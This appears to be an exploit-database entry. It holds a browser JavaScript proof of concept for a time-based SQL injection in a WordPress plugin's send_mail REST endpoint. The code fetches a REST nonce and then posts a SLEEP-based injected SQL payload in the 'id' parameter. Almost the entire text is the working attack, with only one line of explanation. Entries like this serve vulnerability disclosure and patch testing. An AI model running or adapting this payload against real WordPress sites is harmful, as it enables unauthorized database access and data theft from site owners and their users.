## https://sploitus.com/exploit?id=WPEX-ID:32A23D0D-7ECE-4870-A99D-F3F344BE2D67
Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in the injected SQL.
var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();
await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=(SELECT IF (1=1,SLEEP(10),1))&to_email=send@example.com'})).text();